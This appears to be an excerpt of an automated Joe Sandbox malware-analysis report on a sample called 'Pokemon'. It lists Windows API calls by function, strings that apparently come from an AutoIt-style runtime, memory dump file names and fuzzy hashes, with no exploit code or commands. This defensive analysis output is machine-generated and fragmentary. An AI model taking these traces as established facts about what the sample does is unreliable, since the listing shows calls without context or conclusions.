                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 977211eca57c6ab4dff64e72de6b55cb7ff544ef3eb31535dea34b7268f3ad8d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3619D75A00228AFDB10DFA4DC81EEE77B8EF49704F100159FA04E72A1D7B4A965DB50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000FBB18
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB2C
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 000FBB33
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB42
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 000FBB54
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB6D
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB7F
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBBC4
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBBD9
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBBE4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3007
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3013
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C301E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3029
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3034
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C303F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C304A
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3055
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3060
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C306E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00092AF9
                                                                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00092B98
                                                                                                                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00092D7D
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 000D3A1B
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 000D3A80
                                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000D3AAD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001089F2
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108A06
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00108A30
                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00108A4A
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108A5C
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108AA5
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00108AF5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                      • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 000974D7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097567: GetClientRect.USER32(?,?), ref: 0009758D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097567: GetWindowRect.USER32(?,?), ref: 000975CE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097567: ScreenToClient.USER32(?,?), ref: 000975F6
                                                                                                                                                                                                                                                                                      • GetDC.USER32 ref: 000D6083
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000D6096
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000D60A4
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000D60B9
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 000D60C1
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000D6152
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                      • Opcode ID: 6b9142f72ebe067b91223d17beabcafbb0de46ecf1730a619f5b36152bb12fe4
                                                                                                                                                                                                                                                                                      • Instruction ID: 2e5a62676bcebe75f8489133c920486898d3cfadfedd93b6912c0efc5bca9024
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b9142f72ebe067b91223d17beabcafbb0de46ecf1730a619f5b36152bb12fe4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC71BE35500305EFCF758F64CC84AAA7BB5FF49320F18426AE9595A2A7C7329891EB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetCursorPos.USER32(?), ref: 000919E1
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: ScreenToClient.USER32(00000000,?), ref: 000919FE
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000001), ref: 00091A23
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000002), ref: 00091A3D
                                                                                                                                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 001295C7
                                                                                                                                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 001295CD
                                                                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 001295D3
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0012966E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00129681
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0012975B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                      • Opcode ID: 70662d0e1e1be6b4e143aca3963676b5a27c50ee54bf64c3d59b15d02ff1d59c
                                                                                                                                                                                                                                                                                      • Instruction ID: f4857d924e6de7ae7c09074e61a05fb25188a89ca28e167272c8ca8cc22b40d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70662d0e1e1be6b4e143aca3963676b5a27c50ee54bf64c3d59b15d02ff1d59c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51AE70204310AFDB14EF24EC56FAA77E4FB88714F400A2DF995A72E2DB709958DB52
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0010CCB7
                                                                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0010CCDF
                                                                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0010CD0F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0010CD67
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0010CD7B
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0010CD86
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: e28bfd385ebc8083d2a8411e93b9892e87b4352393359ae3d802fb04bc8663cd
                                                                                                                                                                                                                                                                                      • Instruction ID: 487581e8ce0cd7e2f03e345367322d23fb69bcb464cd384f69beaa8aeff43f19
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e28bfd385ebc8083d2a8411e93b9892e87b4352393359ae3d802fb04bc8663cd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE317171500204AFD7319FA5DC84AAB7BFCEB49744B10462EF48593290DB74DD499BE1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000D55AE,?,?,Bad directive syntax error,0012DCD0,00000000,00000010,?,?), ref: 000FA236
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,000D55AE,?), ref: 000FA23D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000FA301
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                      • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                      • Opcode ID: 1dd959b720d29830057a3008ddb99ffd435344046e069025806f7255bf736fd8
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c4093bcf09481be38eddfbb58fac04916b6e1ed248f2c72a8ee3ef50016df01
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd959b720d29830057a3008ddb99ffd435344046e069025806f7255bf736fd8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B217E7190021EEFCF11EBA0DC0AEFE7B79BF18700F004459B615654A3EB729668EB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 000F29F8
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 000F2A0D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000F2A9A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                      • Opcode ID: 6c648b9b79f4e28d508bd6286229e6f50337f9bbfe16456eacd8281ac507368d
                                                                                                                                                                                                                                                                                      • Instruction ID: 769cc7375203fdce0a1dc50b62e267979afcd95bee1b8771b21ad8fd51112b00
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c648b9b79f4e28d508bd6286229e6f50337f9bbfe16456eacd8281ac507368d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C311067634430BFBFA346620EC07DFA37DC8F15725B200012FA04E58D2FB656955A556
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0009758D
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000975CE
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000975F6
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0009773A
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0009775B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0a014833cbfe927f166ca7fa453078713f6adf9d28c85d0a5cddd9170b89e53b
                                                                                                                                                                                                                                                                                      • Instruction ID: 077b4d7a26c91325f800326047158017ba4f5c8fc385e5c4f835e5ebb5379439
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a014833cbfe927f166ca7fa453078713f6adf9d28c85d0a5cddd9170b89e53b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49C15A3991464AEFDF20CFA8C980BEDB7F1FF18310F14841AE899A7250D735A951EB64
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e2474d1ae1b2f015c76ad08f31f11a9675e971d9e7fbdf4c33a997cffcc8cf33
                                                                                                                                                                                                                                                                                      • Instruction ID: d8acb0a57316523c38bd65eb8c5aacaaf00c132c366cce033026ce2c34c29455
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2474d1ae1b2f015c76ad08f31f11a9675e971d9e7fbdf4c33a997cffcc8cf33
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17611371900301AFDB65AFB8DC85FAE7BE8AF11320F09017FF949A7292D671D9408791
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00125C24
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00125C65
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00125C6B
                                                                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00125C6F
                                                                                                                                                                                                                                                                                        • Part of subcall function 001279F2: DeleteObject.GDI32(00000000), ref: 00127A1E
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00125CAB
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00125CB8
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00125CEB
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00125D25
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00125D34
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
